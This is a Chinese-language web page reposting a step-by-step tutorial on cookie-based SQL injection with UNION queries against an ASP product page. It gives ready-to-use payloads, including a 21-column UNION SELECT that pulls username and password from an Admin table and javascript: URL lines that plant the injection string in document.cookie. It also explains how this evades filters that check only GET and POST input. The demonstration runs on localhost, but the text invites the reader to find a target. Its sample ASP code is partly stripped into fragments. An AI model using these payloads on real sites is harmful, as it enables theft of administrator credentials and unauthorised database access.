请选择 进入手机版 | 继续访问电脑版
  • 设为首页
  • 点击收藏
  • 手机版
    手机扫一扫访问
    迪恩网络手机版
  • 关注官方公众号
    微信扫一扫关注
    公众号

教你学会Cookie与联合查询的注入

原作者: [db:作者] 来自: [db:来源] 收藏 邀请
具体的原理与分析过程我就不写了,写起来一大片,大家看的心烦我写的头痛,我就讲操作过程中的细节。隐私报告里设置处需要接受所有的cookie将安全降低。

具体的原理与分析过程我就不写了,写起来一大片,大家看的心烦我写的头痛,我就讲操作过程中的细节。隐私报告里设置处需要接受所有的cookie将安全降低。

cookie值是连接后才保存到本机的,也就是关IE后.

前提条件:一、网站没有过滤cookie方式的注入。

二、需事前了解数据库的管理员表段名,计算一下注入文件数据库查询语句在数据库中的列数。

打开数据库,找到Product这个表名,计算字段数为21个。管理员表名为admin 用户与密码字段名为username、password,呵呵没有注入文件,我们可以自己构造一个测试方便大家的理解。

构造如下简单注入ASP,当然我没作什么严格的过滤,也就是接受任何方式的提交。.

//调用数据库连接文件

")

else

%>

//反回指针处的内容,选取的字段与管理员的用户密码类型要相同

找前图中的ID=55

构造联合查询语句

and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 from Admin 将6,2分别用username、password替换

来试试cookie注入。找个目标,注入点结构与前面相近就不再分析了,仅过滤了post与get注入.

步骤一:重新打开IE,先连接到需注入的网站http://127.0.0.1/nf,也就是去除前面的链接值。注意:不要直接在前面图中的链接处操作,可以会不成功噢。

步骤二:清空地址处IE,再次在地址中加入如下

javascript:alert(document.cookie="id=" escape("56 and 1=2 union select 1,

2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 from Admin"))

再次清空IE打入http://127.0.0.1/nf/ProductShow.asp

步骤四:重复步骤一.注意此步骤必需操作,很多人失败就在这里。

步骤五:清空地址处IE,再次在地址中如下代码

javascript:alert(document.cookie="id=" escape("56 and 1=2 union select 1,

username,3,4,5,6,password,8,9,10,11,12,13,14,15,16,17,18,19,20,21 from Admin"))

步骤六、再次清空地址处IE。http://127.0.0.1/nf/ProductShow.asp

好了全文结束。

鲜花

握手

雷人

路过

鸡蛋
该文章已有0人参与评论

请发表评论

全部评论

专题导读
上一篇:
各种入侵批处理发布时间:2022-02-06
下一篇:
ASPX搜索型注入发布时间:2022-02-06
热门推荐
阅读排行榜

扫描微信二维码

查看手机版网站

随时了解更新最新资讯

139-2527-9053

在线客服(服务时间 9:00~18:00)

在线QQ客服
地址:深圳市南山区西丽大学城创智工业园
电邮:jeky_zhao#qq.com
移动电话:139-2527-9053

Powered by 互联科技 X3.4© 2001-2213 极客世界.|Sitemap